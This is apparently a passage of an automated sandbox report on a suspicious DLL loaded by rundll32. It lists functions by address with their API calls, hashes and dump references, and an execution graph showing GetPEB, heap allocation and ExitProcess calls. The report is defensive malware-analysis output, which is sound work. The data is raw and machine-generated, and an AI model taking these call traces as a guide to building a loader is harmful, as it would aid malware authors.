                                                                                                                          • SysAllocStringByteLen.OLEAUT32(00000000,00000000), ref: 1002BC65
                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000,?,?,0000000C,1002D018,00000000,00000018,1002D35E), ref: 1002BC84
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Byte$CharMultiStringWide$Alloc
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3384502665-0
                                                                                                                          • Opcode ID: 30c8667133e0e99acdefb8fda4e094958d0ee3b60e94751be478a45e222a3836
                                                                                                                          • Instruction ID: 8ac585039279df4530c17525e78cb38a3c471deb65f2ee77315d7d06ea712387
                                                                                                                          • Opcode Fuzzy Hash: 30c8667133e0e99acdefb8fda4e094958d0ee3b60e94751be478a45e222a3836
                                                                                                                          • Instruction Fuzzy Hash: 15F09671106774BF932157629D8CC9BBF9CFE8F3F5B11052AF549C2100D6629800C6F5
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 1003A545 Relevance: 6.0, APIs: 4, Instructions: 47COMMONLIBRARYCODE
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 100352EC: __getptd_noexit.LIBCMT ref: 100352ED
                                                                                                                            • Part of subcall function 100352EC: __amsg_exit.LIBCMT ref: 100352FA
                                                                                                                          • __amsg_exit.LIBCMT ref: 1003A571
                                                                                                                          • __lock.LIBCMT ref: 1003A581
                                                                                                                          • InterlockedDecrement.KERNEL32(?), ref: 1003A59E
                                                                                                                          • InterlockedIncrement.KERNEL32(02211520), ref: 1003A5C9
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd_noexit__lock
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2880340415-0
                                                                                                                          • Opcode ID: 77ce0df2017148a369788d84d5d9eaff25b7537eedda72ae9a584ccf42c9de33
                                                                                                                          • Instruction ID: 227b034a2befce0e561f83ae0ba5e63d07179ac23aa6a18c45afd9c28011782e
                                                                                                                          • Opcode Fuzzy Hash: 77ce0df2017148a369788d84d5d9eaff25b7537eedda72ae9a584ccf42c9de33
                                                                                                                          • Instruction Fuzzy Hash: B2016D35D01E21EFEB42DB65884575D77A0FF067A3F510105E800AF291DB25BA81CBD6
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 1001DC85 Relevance: 6.0, APIs: 4, Instructions: 42COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • FindResourceA.KERNEL32 ref: 1001DCA7
                                                                                                                          • LoadResource.KERNEL32(?,00000000,?,?,?,?,1001703A,?,?,100128C0,0986EB69), ref: 1001DCB3
                                                                                                                          • LockResource.KERNEL32(00000000,?,?,?,?,1001703A,?,?,100128C0,0986EB69), ref: 1001DCC0
                                                                                                                          • FreeResource.KERNEL32(00000000,00000000,?,?,?,?,1001703A,?,?,100128C0,0986EB69), ref: 1001DCDB
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Resource$FindFreeLoadLock
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1078018258-0
                                                                                                                          • Opcode ID: b40af9f0dfb9db239089461bda16c39fe6d8ad8ad62dd4b4922628693a12339f
                                                                                                                          • Instruction ID: 2e1bb7004ec06de307aa608eb86a555f9a12e1d63b329185fddd1afba3e53365
                                                                                                                          • Opcode Fuzzy Hash: b40af9f0dfb9db239089461bda16c39fe6d8ad8ad62dd4b4922628693a12339f
                                                                                                                          • Instruction Fuzzy Hash: 74F09676301A126B93417B654E84A7BBB9CEFC65A2701013AFE05D7211EEB1CC45C2A6
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 100174CD Relevance: 6.0, APIs: 4, Instructions: 32COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • EnableWindow.USER32(000000FF,00000001), ref: 100174ED
                                                                                                                          • GetActiveWindow.USER32 ref: 100174F8
                                                                                                                          • SetActiveWindow.USER32(000000FF), ref: 10017506
                                                                                                                          • FreeResource.KERNEL32(00000008,?,00000024,100010EC,00000000,10046640), ref: 10017522
                                                                                                                            • Part of subcall function 1001DECA: EnableWindow.USER32(?,10046640), ref: 1001DED7
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Window$ActiveEnable$FreeResource
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 253586258-0
                                                                                                                          • Opcode ID: eb27006848965884004c9991400e475c3ac81a8aa5cc97471f58b07f94fae74b
                                                                                                                          • Instruction ID: b8177a2bef97c6db83ac0ed626da55a545c9139c8ac7342270f03f66935dd0b6
                                                                                                                          • Opcode Fuzzy Hash: eb27006848965884004c9991400e475c3ac81a8aa5cc97471f58b07f94fae74b
                                                                                                                          • Instruction Fuzzy Hash: C5F03C34900A15CFDF12EB64CD8559DBBF2FF88702B100115E446BA161DB72AD80CE16
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 1002E206 Relevance: 6.0, APIs: 4, Instructions: 21COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetTickCount.KERNEL32 ref: 1002E228
                                                                                                                          • GetTickCount.KERNEL32 ref: 1002E235
                                                                                                                          • CoFreeUnusedLibraries.OLE32 ref: 1002E244
                                                                                                                          • GetTickCount.KERNEL32 ref: 1002E24A
                                                                                                                            • Part of subcall function 1002E1AF: CoFreeUnusedLibraries.OLE32 ref: 1002E1F3
                                                                                                                            • Part of subcall function 1002E1AF: OleUninitialize.OLE32 ref: 1002E1F9
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CountTick$FreeLibrariesUnused$Uninitialize
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 685759847-0
                                                                                                                          • Opcode ID: 5645409a338d605000a15fbb944d62efc2c9a6456e8d0e25dbd15ca34f7d067c
                                                                                                                          • Instruction ID: b81a2157dff59843e5c721b5fa459b83a8bef19e296eb3c7ce89af4ff474d23a
                                                                                                                          • Opcode Fuzzy Hash: 5645409a338d605000a15fbb944d62efc2c9a6456e8d0e25dbd15ca34f7d067c
                                                                                                                          • Instruction Fuzzy Hash: 3BE012358D42B4CBFB04FB20ED883A93BE8FB46305F514527D04692165DB346C59DF52
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 10027CC2 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 170COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: ClearVariant
                                                                                                                          • String ID: (
                                                                                                                          • API String ID: 1473721057-3887548279
                                                                                                                          • Opcode ID: 008ec943e52341c0dca71a05145884f93f6144af570bd047c2597266c283ece8
                                                                                                                          • Instruction ID: 55505e3d54abccaab23e3fb35bc0536c28338c561f08ce7921e5662988eb51c3
                                                                                                                          • Opcode Fuzzy Hash: 008ec943e52341c0dca71a05145884f93f6144af570bd047c2597266c283ece8
                                                                                                                          • Instruction Fuzzy Hash: 52517A75600B11DFCB64CF68D9C2A2AB7F5FF48314B904A6DE5868BA52C770F981CB50
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 100259EE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 150COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: H_prolog3
                                                                                                                          • String ID: @
                                                                                                                          • API String ID: 431132790-2766056989
                                                                                                                          • Opcode ID: 154d677d06bdea17fd7c180cae35ab477e1537548e58b8b808fb5212b96a33b2
                                                                                                                          • Instruction ID: 3c539a28780873688809e1a5131d88fd7e7c20f84f620333ebd6e4501b894ad0
                                                                                                                          • Opcode Fuzzy Hash: 154d677d06bdea17fd7c180cae35ab477e1537548e58b8b808fb5212b96a33b2
                                                                                                                          • Instruction Fuzzy Hash: 2951D5B0A0020A9FDB04CFA8C8D8AEEB7F9FF48305F50456AE516EB251E775A945CF50
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 1001508F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 53COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 100150B5
                                                                                                                          • PathFindExtensionA.SHLWAPI(?), ref: 100150CB
                                                                                                                            • Part of subcall function 10014B27: _strcpy_s.LIBCMT ref: 10014B33
                                                                                                                            • Part of subcall function 10014DA8: __EH_prolog3.LIBCMT ref: 10014DC7
                                                                                                                            • Part of subcall function 10014DA8: GetModuleHandleA.KERNEL32(kernel32.dll,00000058), ref: 10014DE8
                                                                                                                            • Part of subcall function 10014DA8: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 10014DF9
                                                                                                                            • Part of subcall function 10014DA8: ConvertDefaultLocale.KERNEL32(?), ref: 10014E2F
                                                                                                                            • Part of subcall function 10014DA8: ConvertDefaultLocale.KERNEL32(?), ref: 10014E37
                                                                                                                            • Part of subcall function 10014DA8: GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 10014E4B
                                                                                                                            • Part of subcall function 10014DA8: ConvertDefaultLocale.KERNEL32(?), ref: 10014E6F
                                                                                                                            • Part of subcall function 10014DA8: ConvertDefaultLocale.KERNEL32(000003FF), ref: 10014E75
                                                                                                                            • Part of subcall function 10014DA8: GetModuleFileNameA.KERNEL32(10000000,?,00000105), ref: 10014EAE
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: ConvertDefaultLocale$Module$AddressFileNameProc$ExtensionFindH_prolog3HandlePath_strcpy_s
                                                                                                                          • String ID: %s.dll
                                                                                                                          • API String ID: 3444012488-3668843792
                                                                                                                          • Opcode ID: 658e8660b57156c47c50295d269887a352ab673736f5c816275cebcb6cd6bc48
                                                                                                                          • Instruction ID: 0816ccb3c2c5dc3d5c2f43fd153125c4ae2bbce82e663fde520804fb1fdab18a
                                                                                                                          • Opcode Fuzzy Hash: 658e8660b57156c47c50295d269887a352ab673736f5c816275cebcb6cd6bc48
                                                                                                                          • Instruction Fuzzy Hash: 9901B971A10118BBDF09DB74DD96AEEB3B8DF04B01F0105E9EA02DB140EEB1EE448A61
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 10001FF0 Relevance: 5.2, APIs: 4, Instructions: 181COMMONLIBRARYCODE
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • IsBadReadPtr.KERNEL32(00000000,00000014,?,?,?,?,100025CE,00000000,00000000), ref: 10002045
                                                                                                                          • SetLastError.KERNEL32(0000007E), ref: 10002087
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: ErrorLastRead
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 4100373531-0
                                                                                                                          • Opcode ID: b6f425d35b460735779e1ed3fb281948f59bf2ef0f2add24d18ae520f481b1e4
                                                                                                                          • Instruction ID: bdea880ba7c0c5bd5d2dbe714977ff7d927dc75702b615567210b407e242d671
                                                                                                                          • Opcode Fuzzy Hash: b6f425d35b460735779e1ed3fb281948f59bf2ef0f2add24d18ae520f481b1e4
                                                                                                                          • Instruction Fuzzy Hash: B181A8B4A00209EFDB04CF94C980AAEB7B1FF48354F248159E919AB355D735EE82CF94
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 10020B38 Relevance: 5.1, APIs: 4, Instructions: 60COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 10020B95
                                                                                                                          • LeaveCriticalSection.KERNEL32(?,?), ref: 10020BA5
                                                                                                                          • LocalFree.KERNEL32(?), ref: 10020BAE
                                                                                                                          • TlsSetValue.KERNEL32(?,00000000), ref: 10020BC0
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CriticalSection$EnterFreeLeaveLocalValue
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2949335588-0
                                                                                                                          • Opcode ID: 6676c0264c2eb297a537204f12f4d5c162c59b7e83937d8b07f604b269a52a54
                                                                                                                          • Instruction ID: af4df8c6ab00e3b134578f48d56f113cbd39bdf93991f651abc1e22c3acb8acd
                                                                                                                          • Opcode Fuzzy Hash: 6676c0264c2eb297a537204f12f4d5c162c59b7e83937d8b07f604b269a52a54
                                                                                                                          • Instruction Fuzzy Hash: 70113435600305EFE721CF54D9C4B9AB7AAFF0A35AF508429F5528B5A2DB71F980CB50
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 10020E5D Relevance: 5.0, APIs: 4, Instructions: 37COMMONLIBRARYCODE
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • EnterCriticalSection.KERNEL32(10057798,?,?,?,?,1002074A,00000010,00000008,1001FA2A,1001F9CD,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020E99
                                                                                                                          • InitializeCriticalSection.KERNEL32(?,?,?,?,?,1002074A,00000010,00000008,1001FA2A,1001F9CD,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020EA8
                                                                                                                          • LeaveCriticalSection.KERNEL32(10057798,?,?,?,?,1002074A,00000010,00000008,1001FA2A,1001F9CD,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020EB5
                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,?,?,1002074A,00000010,00000008,1001FA2A,1001F9CD,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020EC1
                                                                                                                            • Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CriticalSection$Enter$Exception@8InitializeLeaveThrow
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3253506028-0
                                                                                                                          • Opcode ID: cf9bd6703211ded15ebc294ea5b4eaffa7e14a09b8c66129e44fb6711d6d5733
                                                                                                                          • Instruction ID: 3404b174272e1aedd22e2de365cf3e448d28d784c73140ac4aa41e98356ae93e
                                                                                                                          • Opcode Fuzzy Hash: cf9bd6703211ded15ebc294ea5b4eaffa7e14a09b8c66129e44fb6711d6d5733
                                                                                                                          • Instruction Fuzzy Hash: 5AF0907350031A9BDB10DB58FC88B1AB6AAFB96355F870816F64582123EB3264C48A61
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 100206C8 Relevance: 5.0, APIs: 4, Instructions: 31COMMONLIBRARYCODE
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • EnterCriticalSection.KERNEL32(100575E0,?,?,?,10020C8D,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004,10001031), ref: 100206D1
                                                                                                                          • TlsGetValue.KERNEL32 ref: 100206E6
                                                                                                                          • LeaveCriticalSection.KERNEL32(100575E0,?,?,?,10020C8D,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004,10001031), ref: 100206FC
                                                                                                                          • LeaveCriticalSection.KERNEL32(100575E0,?,?,?,10020C8D,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004,10001031), ref: 10020707
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CriticalSection$Leave$EnterValue
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3969253408-0
                                                                                                                          • Opcode ID: 384891d58c6dafcceaf36b456d2d2389f12afbb41143d91066085e81aa889ef7
                                                                                                                          • Instruction ID: 186a6cd651b3b82d4df79f5272d157dd9dcdda25cd8a7682fbe975f35e4e1d68
                                                                                                                          • Opcode Fuzzy Hash: 384891d58c6dafcceaf36b456d2d2389f12afbb41143d91066085e81aa889ef7
                                                                                                                          • Instruction Fuzzy Hash: 51F0FE76604720DFD320CF64DD8880B73ABEB8925135A9555F842D3123E630F8058F61
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Execution Graph

                                                                                                                          Execution Coverage:15.7%
                                                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                                                          Signature Coverage:0%
                                                                                                                          Total number of Nodes:1080
                                                                                                                          Total number of Limit Nodes:17
                                                                                                                          execution_graph 5241 224ee3 5242 22b6cf GetPEB 5241->5242 5243 225133 5242->5243 5244 22b23c 2 API calls 5243->5244 5245 22514c 5244->5245 5246 23dcf7 2 API calls 5245->5246 5253 2251ad 5245->5253 5247 225167 5246->5247 5248 2247ce GetPEB 5247->5248 5249 22518e 5248->5249 5250 22a8b0 GetPEB 5249->5250 5251 22519b 5250->5251 5252 231f8a 2 API calls 5251->5252 5252->5253 5275 221993 5276 2219dd 5275->5276 5277 23aa30 GetPEB 5276->5277 5278 221a3f 5277->5278 3982 222950 3987 232550 3982->3987 3986 222a1a 4006 233775 3987->4006 3990 238519 GetPEB 3990->4006 3994 23e1d4 RtlAllocateHeap GetPEB 3994->4006 3995 233ff6 4246 237dd5 3995->4246 3996 233fe1 4239 2291b0 3996->4239 4005 233fbb 4228 23cb5b 4005->4228 4006->3990 4006->3994 4006->3995 4006->3996 4006->4005 4013 222a06 4006->4013 4022 237ba6 RtlAllocateHeap GetPEB 4006->4022 4025 22a8b0 GetPEB 4006->4025 4029 2320ba 4006->4029 4039 234116 4006->4039 4047 230326 4006->4047 4051 2259f2 4006->4051 4061 2395fa 4006->4061 4072 23044f 4006->4072 4086 235cc4 4006->4086 4099 2387d1 4006->4099 4104 2264e2 4006->4104 4114 23473c 4006->4114 4121 225361 4006->4121 4129 231ddd 4006->4129 4133 240056 4006->4133 4144 2366ca 4006->4144 4154 222251 4006->4154 4161 22b2c7 4006->4161 4173 231ee7 4006->4173 4176 239eec 4006->4176 4185 2251bb 4006->4185 4190 238be3 4006->4190 4194 22dff3 4006->4194 4201 237d48 4006->4201 4204 23d2ce 4006->4204 4209 228dc4 4006->4209 4213 226d24 4006->4213 4222 239bcf 4006->4222 4026 2293ed 4013->4026 4022->4006 4025->4006 4027 23aa30 GetPEB 4026->4027 4028 229456 ExitProcess 4027->4028 4028->3986 4033 2323c3 4029->4033 4030 232503 4284 23da22 4030->4284 4033->4030 4036 232501 4033->4036 4260 238f9e 4033->4260 4264 2346bb 4033->4264 4268 22912c 4033->4268 4272 227ff2 4033->4272 4277 22a55f 4033->4277 4036->4006 4041 2343df 4039->4041 4043 234508 4041->4043 4045 23da22 GetPEB 4041->4045 4337 229350 4041->4337 4341 231e67 4041->4341 4345 228f65 4041->4345 4349 23c1ec 4041->4349 4043->4006 4045->4041 4048 230340 4047->4048 4049 23044a 4048->4049 4050 229011 